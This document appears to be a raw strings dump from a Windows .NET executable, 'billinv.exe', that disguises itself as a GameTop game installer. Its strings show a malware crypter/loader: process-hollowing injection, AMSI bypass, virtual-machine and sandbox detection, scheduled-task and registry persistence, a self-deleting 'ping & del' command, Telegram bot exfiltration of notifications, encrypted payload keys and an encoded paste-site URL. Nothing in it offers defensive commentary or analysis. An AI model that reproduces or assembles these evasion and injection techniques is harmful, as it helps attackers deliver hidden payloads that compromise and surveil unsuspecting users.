!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
<Module>
billinv.exe
Program
Stubcry
StartupInfo
config
NIKBINARY32bit
mscorlib
System
Object
ValueType
System.Threading
hotMutex
sayebMutex
GetProcAddress
LoadLibrary
VirtualProtect
FOKFILE
socketnotify
NIKFELSTART
Taskzebi
jibzok
MCHHNE
FOKSTRING
abathr
Sandboxzebizebi
sendtg
DetectVirtualMachine
nikamsi
PowershellStage
DeleteItself
IsRunningInVirtualEnvironment
System.Drawing
lastCursorPosition
niklhaomha
dwFlags
wShowWindow
istartup
ispersist
isNative
istask
isdotnet
isexcludewd
issleep
folder
FileName
servicename
fullpath
sleeptime
isrunportal32
isrunportal64
isdotnetload
ispassamsi
ispwcommand
issocketnotify
serverpass
istelegramnotify
bottoken
chatid
nativeipath
ismelt
dotnetipath
command
antivm
CREATE_NEW_CONSOLE
CREATE_NEW_PROCESS_GROUP
CREATE_NO_WINDOW
CREATE_SUSPENDED
CREATE_UNICODE_ENVIRONMENT
DETACHED_PROCESS
NORMAL_PRIORITY_CLASS
HIGH_PRIORITY_CLASS
ABOVE_NORMAL_PRIORITY_CLASS
REALTIME_PRIORITY_CLASS
IDLE_PRIORITY_CLASS
VirtualAllocEx
CreateProcess
WriteProcessMemory
TerminateProcess
ResumeThread
GetThreadContext
SetThreadContext
Wow64GetThreadContext
Wow64SetThreadContext
NtUnmapViewOfSection
RtlZeroMemory
NtResumeProcess
IsWow64Process
nik5ra
ZwUnmapViewOfSection
CloseHandle
openfile
hModule
procName
lpAddress
dwSize
flNewProtect
lpflOldProtect
System.Runtime.InteropServices
OutAttribute
base64Cipher
base64Key
base64IV
ipAddress
password
minutes
zebizebi
destinationDirectory
newName
encrypted
encodedCommand
process
address
allocationType
flProtect
appName
secAttrib
threadAttrib
inheritHandles
creationFlags
environment
currentDirectory
startupInfo
processInfo
written
hProcess
exitCode
hThread
context
memory
_isWow64ProcessResult
commandline
payload
lpApplicationName
lpCommandLine
lpProcessAttributes
lpThreadAttributes
bInheritHandles
dwCreationFlags
lpEnvironment
lpCurrentDirectory
lpStartupInfo
lpProcessInfo
flAllocationType
lpBaseAddress
lpBuffer
ProcessHandle
BaseAddress
lpContext
handle
payloadBuffer
source
alignment
System.Reflection
AssemblyTitleAttribute
AssemblyDescriptionAttribute
AssemblyCompanyAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyTrademarkAttribute
AssemblyFileVersionAttribute
AssemblyVersionAttribute
GuidAttribute
ComVisibleAttribute
System.Security.Permissions
SecurityPermissionAttribute
SecurityAction
System.Runtime.CompilerServices
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
billinv
OpenExisting
TimeSpan
WaitHandle
WaitOne
WaitHandleCannotBeOpenedException
ReleaseMutex
Dispose
DllImportAttribute
kernel32
Convert
FromBase64String
System.Security.Cryptography
Create
SymmetricAlgorithm
set_Key
set_IV
get_Key
get_IV
ICryptoTransform
CreateDecryptor
System.IO
MemoryStream
CryptoStream
Stream
CryptoStreamMode
ToArray
IDisposable
System.Net.Sockets
Socket
AddressFamily
SocketType
ProtocolType
Connect
String
Environment
get_UserName
Concat
System.Text
Encoding
get_ASCII
GetBytes
SocketShutdown
Shutdown
SocketException
Microsoft.Win32
Registry
RegistryKey
CurrentUser
OpenSubKey
SetValue
System.Diagnostics
ProcessStartInfo
set_FileName
set_CreateNoWindow
ProcessWindowStyle
set_WindowStyle
set_Arguments
Process
Buffer
BlockCopy
Assembly
op_Inequality
MethodInfo
get_EntryPoint
get_ReturnType
RuntimeTypeHandle
GetTypeFromHandle
op_Equality
MethodBase
Invoke
GetEntryAssembly
get_Location
Combine
System.Core
System.Linq
Enumerable
System.Collections.Generic
List`1
IEnumerable`1
ToList
get_Item
get_Length
get_Chars
ToChar
get_Count
Reverse
System.Net
WebRequest
HttpWebRequest
set_Method
WebResponse
GetResponse
HttpWebResponse
GetResponseStream
StreamReader
TextReader
ReadToEnd
System.Windows.Forms
Cursor
get_Position
Thread
Debugger
get_IsAttached
ServicePointManager
SecurityProtocolType
set_SecurityProtocol
WebException
System.Management
ManagementObjectSearcher
ManagementObjectCollection
ManagementObjectEnumerator
GetEnumerator
ManagementBaseObject
get_Current
ToString
ToLower
ToUpperInvariant
Contains
MessageBox
DialogResult
MessageBoxButtons
MessageBoxIcon
MoveNext
UIntPtr
op_Explicit
<PrivateImplementationDetails>{293EC075-4090-4566-9CF0-598A493AD333}
CompilerGeneratedAttribute
__StaticArrayInitTypeSize=6
$$method0x6000011-1
RuntimeHelpers
RuntimeFieldHandle
InitializeArray
Marshal
WaitForExit
GetCurrentProcess
ProcessModule
get_MainModule
get_FileName
set_Verb
Directory
Exists
DirectoryInfo
CreateDirectory
get_UTF8
GetString
Replace
Console
WriteLine
STAThreadAttribute
Application
EnableVisualStyles
SetCompatibleTextRenderingDefault
.cctor
StructLayoutAttribute
LayoutKind
FieldOffsetAttribute
SpecialFolder
GetFolderPath
RuntimeEnvironment
GetRuntimeDirectory
kernel32.dll
ntdll.dll
ReadInt32
ReadInt16
IntPtr
get_Size
AllocHGlobal
ReadIntPtr
SizeOf
op_Addition
WriteInt32
BitConverter
GetLastWin32Error
System.ComponentModel
Win32Exception
ReadInt64
IsNullOrEmpty
GetCurrentDirectory
WriteInt64
FreeHGlobal
ToInt64
System.Security
UnverifiableCodeAttribute
<GameTop Pte. Ltd.
<Match Ventures Setup
eCopyright
GameTop Pte. Ltd.
0.0.0.0
$413d0a63-8b80-426d-92de-a24f8d416b2c
WrapNonExceptionThrows
System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
SkipVerification
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
N1o8DA4FNS1BOxpGAEBXBB9jBVMfJhwWIB4KVQoyCQUmO1ITD1MEXFgGBFEf
V2yPogCK$IS!a22aw3Y5uDmwVT
JFkLfgkfJSVDPCNH
/create /sc MINUTE /mo
/tn "
" /tr "
Ku*VyShAV%IcMcFa
https://api.telegram.org/bot
/sendMessage?chat_id=
&text=
Select * from Win32_ComputerSystem
Manufacturer
microsoft corporation
VIRTUAL
vmware
VirtualBox
vm Check!
Don t use on vm
ORQ8cBEtPhQ=
@mM^gKDz#r4ZpKvI
JR8+LQ8EJRRTNEI8CgU=
MgY/cB4yNg9FF0YwEig=
cmd.exe
/C ping 127.0.0.1 -n 2 > nul & del "
PEExecutedon:
ExePath=
GFMvLFIoOTIOK1AfTkUXOw==
j#N^7ZJ@kh3Ec4fu
H0QgHVY4PCYDEUMuMRk=
GEg8cE4jODUtDUEvAXc=
DE0vNlI=
aHR0cDovL3Bhc3RlLnNlbnNpby5uby9SZXBsaWNhU2VyZW5h
cT0j6Iw9VylE9o8lcfS4/Bcb8loeSeBirgvin5wpiwg=
0SRVQvZDd6l4hBTnn+E0TQ==
hakeka
$FOLDER
$FNAME.exe
$service
$serverpassword
$bottoken
$chatid
#NATIVEINJECTPATH
#DOTNETINJECTPATH
UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AZwBvAG8AZwBsAGUALgBjAG8AbQAvACIA
attackercrypter_10848_3e9d37ea1d8946d2b4c964de04eb285a
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
Match Ventures Setup
CompanyName
GameTop Pte. Ltd.
FileDescription
GameTop Pte. Ltd.
FileVersion
0.0.0.0
InternalName
billinv.exe
LegalCopyright
Copyright
GameTop Pte. Ltd.
OriginalFilename
billinv.exe
ProductName
GameTop Pte. Ltd.
ProductVersion
0.0.0.0
Assembly Version
0.0.0.0